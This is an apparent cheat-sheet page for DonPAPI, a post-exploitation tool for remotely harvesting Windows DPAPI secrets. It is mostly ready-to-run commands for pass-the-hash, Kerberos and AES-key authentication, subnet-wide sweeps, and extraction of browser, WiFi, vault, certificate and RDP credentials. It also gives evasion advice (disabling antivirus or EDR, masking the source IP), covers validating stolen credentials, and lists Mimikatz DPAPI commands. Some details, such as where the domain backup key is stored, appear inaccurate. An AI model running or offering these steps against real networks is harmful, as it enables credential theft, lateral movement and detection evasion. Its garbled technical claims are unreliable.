DonPAPI
DonPAPI is a post-exploitation framework for remotely harvesting Windows credentials and secrets via DPAPI without touching LSASS. It extracts browser passwords, WiFi keys, vault credentials, and certificates from target machines over the network.
Installation
Section intitulée « Installation »Install from PyPI:
pip install donpapi
Install from source:
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
pip install -r requirements.txt
python donpapi.py --help
Requires Python 3.8+, Impacket, and Windows domain credentials for remote access.
Quick Start
Section intitulée « Quick Start »Basic usage with password authentication:
donpapi -d DOMAIN -u USERNAME -p PASSWORD 192.168.1.100
Single IP with domain admin account:
donpapi -d contoso.com -u admin -p 'P@ssw0rd!' 10.0.0.50
Against multiple targets:
donpapi -d domain.com -u user -p pass 10.0.0.0/24
Authentication Methods
Section intitulée « Authentication Methods »Password Authentication
Section intitulée « Password Authentication »donpapi -d DOMAIN -u USERNAME -p PASSWORD TARGET
donpapi -d corp -u jdoe -p 'MyPassword123!' 192.168.1.100
NTLM Hash (Pass-the-Hash)
Section intitulée « NTLM Hash (Pass-the-Hash) »donpapi -d DOMAIN -u USERNAME -H NTHASH TARGET
donpapi -d corp -u admin -H 8846f7eaee8fb117ad06bdd830b7586c 10.0.0.50
Kerberos Authentication
Section intitulée « Kerberos Authentication »donpapi -d DOMAIN -u USERNAME -k TARGET
export KRB5CCNAME=/tmp/user.ccache
donpapi -d corp -u jdoe -k 192.168.1.100
AES Key Authentication
Section intitulée « AES Key Authentication »donpapi -d DOMAIN -u USERNAME -aesKey AESKEY TARGET
donpapi -d corp -u user -aesKey abc123def456... 10.0.0.100
Current Session (LUID/Session Token)
Section intitulée « Current Session (LUID/Session Token) »donpapi -luid TOKEN TARGET
donpapi -luid 0x12345:0x6789abc 192.168.1.100
Target Specification
Section intitulée « Target Specification »Single IP Address
Section intitulée « Single IP Address »donpapi -d domain.com -u admin -p pass 192.168.1.100
CIDR Range
Section intitulée « CIDR Range »donpapi -d domain.com -u admin -p pass 192.168.1.0/24
donpapi -d domain.com -u admin -p pass 10.0.0.0/16
Targets from File
Section intitulée « Targets from File »donpapi -d domain.com -u admin -p pass -tf targets.txt
targets.txt format (one per line):
192.168.1.100
192.168.1.101
192.168.1.102
10.0.0.50
Target IP Override
Section intitulée « Target IP Override »donpapi -d domain.com -u admin -p pass --target-ip 192.168.1.100 hostname
What It Collects
Section intitulée « What It Collects »Browser Credentials
Section intitulée « Browser Credentials »Extracts cached passwords and stored credentials from:
# Chrome/Chromium passwords and saved autofill
# Microsoft Edge passwords and autofill
# Firefox passwords (if encrypted with DPAPI)
# Opera, Brave, and other Chromium-based browsers
| Browser | Passwords | Cookies | Autofill | Bookmarks |
|---|---|---|---|---|
| Chrome | Yes | Yes | Yes | No |
| Edge | Yes | Yes | Yes | No |
| Firefox | Yes | No | No | No |
| Opera | Yes | Yes | Yes | No |
| Brave | Yes | Yes | Yes | No |
WiFi Passwords
Section intitulée « WiFi Passwords »Recovers stored wireless network credentials:
# All SSID names and pre-shared keys (PSK)
# Connection profiles with DPAPI encryption
# Requires domain backup key for decryption
Windows Vault Credentials
Section intitulée « Windows Vault Credentials »Extracts stored credentials from Windows Credential Manager:
# Generic credentials (username/password pairs)
# Domain credentials
# Certificate-based credentials
# Session cookies
Certificate Data
Section intitulée « Certificate Data »Harvests certificate-related secrets:
# Private keys
# Client certificates
# Server certificates
# Certificate thumbprints
RDP Connection History
Section intitulée « RDP Connection History »Retrieves Remote Desktop credentials:
# Saved RDP connection passwords
# Connection metadata
# Server information
Scheduled Task Credentials
Section intitulée « Scheduled Task Credentials »Extracts credentials from scheduled tasks:
# Task-embedded usernames and passwords
# Run-as credentials
# Service account details
Collection Methods
Section intitulée « Collection Methods »Registry Access Over SMB
Section intitulée « Registry Access Over SMB »# HKEY_CURRENT_USER registry hives remotely
# HKEY_LOCAL_MACHINE sensitive locations
# No local execution required
# SAM/SECURITY/SYSTEM hives for hash extraction
Protected File Retrieval
Section intitulée « Protected File Retrieval »# Copies protected files via SMB
# Browser database files
# Vault credential stores
# DPAPI protected files
Stealthy vs. Mimikatz
Section intitulée « Stealthy vs. Mimikatz »DonPAPI advantages over Mimikatz:
# No LSASS memory access required
# No code injection needed
# No process creation on target
# Remote execution only
# No antivirus hooks on LSASS
# Recoverable from disk artifacts
# Minimal memory footprint
Output and Reporting
Section intitulée « Output and Reporting »Specify Output Directory
Section intitulée « Specify Output Directory »donpapi -d domain.com -u admin -p pass -o /tmp/output 192.168.1.100
Output Structure
Section intitulée « Output Structure »output/
├── 192.168.1.100/
│ ├── Browser Credentials/
│ │ ├── chrome_passwords.txt
│ │ ├── edge_passwords.txt
│ │ └── firefox_logins.json
│ ├── Wifi/
│ │ └── wifi_passwords.txt
│ ├── Windows Vault/
│ │ └── vault_credentials.txt
│ ├── Windows Certificates/
│ │ └── certificates.pem
│ ├── RDP/
│ │ └── rdp_credentials.txt
│ └── report.html
HTML Report
Section intitulée « HTML Report »Automatically generated summary:
# Visual dashboard of recovered credentials
# Target overview and collection summary
# Credentials grouped by type
# Timeline of collection
# Export-ready formats
Database Export
Section intitulée « Database Export »# SQLite database with all findings
# Searchable credential repository
# Machine-readable format
# Integration with credential managers
Filtering Options
Section intitulée « Filtering Options »Exclude Browser Credentials
Section intitulée « Exclude Browser Credentials »donpapi -d domain.com -u admin -p pass --no-browser 192.168.1.100
Exclude VNC Credentials
Section intitulée « Exclude VNC Credentials »donpapi -d domain.com -u admin -p pass --no-vnc 192.168.1.100
Exclude WiFi Passwords
Section intitulée « Exclude WiFi Passwords »donpapi -d domain.com -u admin -p pass --no-wifi 192.168.1.100
Exclude Sysadmin Accounts
Section intitulée « Exclude Sysadmin Accounts »donpapi -d domain.com -u admin -p pass --no-sysadmins 192.168.1.100
Selective Collection
Section intitulée « Selective Collection »donpapi -d domain.com -u admin -p pass --filter browsers,wifi,vault 192.168.1.100
donpapi -d domain.com -u admin -p pass --filter certificates,rdp 192.168.1.100
Combined Filtering
Section intitulée « Combined Filtering »donpapi -d domain.com -u admin -p pass --no-browser --no-vnc --filter vault,wifi 10.0.0.0/24
DPAPI Explained
Section intitulée « DPAPI Explained »Windows DPAPI Overview
Section intitulée « Windows DPAPI Overview »DPAPI (Data Protection API) is Windows’ built-in encryption mechanism:
# User-level keys: encrypted with user password
# Machine-level keys: encrypted with SYSTEM
# Domain backup key: allows domain admin decryption
# Master keys stored in user's profile
DPAPI Master Keys
Section intitulée « DPAPI Master Keys »Location and structure:
# User keys: C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\{SID}
# System keys: C:\Windows\System32\Microsoft\Protect\S-1-5-18
# Multiple master keys per user (created periodically)
# Protected by user's logon password
Domain Backup Key Recovery
Section intitulée « Domain Backup Key Recovery »# Domain admins can extract domain backup key
# Allows decryption of all domain user DPAPI secrets
# Stored in AD (msDS-KeyCredentialLink, etc.)
# Enables offline credential recovery
Advanced Options
Section intitulée « Advanced Options »Provide Domain Backup Key
Section intitulée « Provide Domain Backup Key »donpapi -d domain.com -u admin -p pass --pvk domain_backup.pvk 192.168.1.100
Specify Domain Controller IP
Section intitulée « Specify Domain Controller IP »donpapi -d domain.com -u admin -p pass --dc-ip 10.0.0.10 192.168.1.100
Custom Target IP
Section intitulée « Custom Target IP »donpapi -d domain.com -u admin -p pass --target-ip 10.0.0.100 WORKSTATION01
Port Specification
Section intitulée « Port Specification »donpapi -d domain.com -u admin -p pass -ports 445,3389 192.168.1.100
donpapi -d domain.com -u admin -p pass --port 445 192.168.1.0/24
Multithreaded Collection
Section intitulée « Multithreaded Collection »donpapi -d domain.com -u admin -p pass --threads 10 192.168.1.0/24
Verbose Logging
Section intitulée « Verbose Logging »donpapi -d domain.com -u admin -p pass -v 192.168.1.100
donpapi -d domain.com -u admin -p pass -vv 192.168.1.100
Troubleshooting
Section intitulée « Troubleshooting »Connection Refused
Section intitulée « Connection Refused »Check network connectivity and firewall:
# Verify SMB port 445 is open
# Confirm credentials are valid
# Check firewall rules on target
# Ensure target is reachable
Access Denied
Section intitulée « Access Denied »Verify authentication credentials:
# Confirm username and password
# Check user has administrative rights
# Verify domain name is correct
# Test with different credential type (hash vs. password)
No Credentials Found
Section intitulée « No Credentials Found »Target may have limited secrets stored:
# User may not have browser passwords saved
# WiFi passwords only stored for currently connected network
# Check --no-* filters aren't excluding data
# Verify user has logged in and cached credentials
DPAPI Decryption Fails
Section intitulée « DPAPI Decryption Fails »Cannot decrypt without proper keys:
# Domain backup key not available
# User password not correct
# DPAPI masterkey file corrupted
# Try with domain admin account for better access
SMB Enumeration Timeout
Section intitulée « SMB Enumeration Timeout »Increase timeout for slow networks:
donpapi -d domain.com -u admin -p pass --timeout 30 192.168.1.100
Best Practices
Section intitulée « Best Practices »Operational Security
Section intitulée « Operational Security »# Use domain admin or compromised admin account
# Filter unnecessary data collections (--no-browser if not needed)
# Disable antivirus/EDR temporarily if possible
# Run against specific targets, not blind scans
# Clean up output files after collection
# Use VPN/proxy to mask source IP
Collection Strategy
Section intitulée « Collection Strategy »# Target high-value systems first (servers, admin workstations)
# Prioritize domain controllers for backup key extraction
# Focus on service accounts with stored credentials
# Combine with credential validation tools
# Document all collected credentials safely
Credential Validation
Section intitulée « Credential Validation »After collection, validate credentials:
# Test RDP credentials against target
# Verify domain account access
# Check WiFi connectivity
# Authenticate to discovered systems
# Prioritize credentials by privilege level
Safe Storage
Section intitulée « Safe Storage »Protect harvested credentials:
# Store output directory on encrypted volume
# Restrict access to findings
# Use separate reporting machine
# Archive securely for cleanup
# Document chain of custody
Related Tools
Section intitulée « Related Tools »Mimikatz DPAPI Modules
Section intitulée « Mimikatz DPAPI Modules »Extract DPAPI secrets with Mimikatz:
mimikatz.exe "dpapi::cred /in:C:\Users\user\AppData\Roaming\..."
mimikatz.exe "dpapi::masterkey /in:masterkey_file"
mimikatz.exe "dpapi::cache" # List cached DPAPI data
SharpDPAPI
Section intitulée « SharpDPAPI »C# DPAPI extraction tool:
# Windows-native DPAPI exploitation
# Chromium-based browser password extraction
# Vault credential recovery
# RDP connection harvesting
Impacket dpapi.py
Section intitulée « Impacket dpapi.py »Python DPAPI utilities:
# Masterkey file parsing
# DPAPI secret decryption
# Domain backup key operations
# Cryptographic key extraction
Multi-platform credential recovery:
# Browser password extraction
# VPN credential harvesting
# Mail client password recovery
# SSH key enumeration
Other Credential Tools
Section intitulée « Other Credential Tools »| Tool | Purpose | Stealth |
|---|---|---|
| Mimikatz | In-memory credential dumping | Low |
| procdump + pypykatz | Indirect LSASS dumping | Medium |
| Nirsoft tools | Cached credential recovery | Medium |
| SafetyKatz | Obfuscated Mimikatz variant | Medium |
| Credentials.ps1 | PowerShell credential module | High |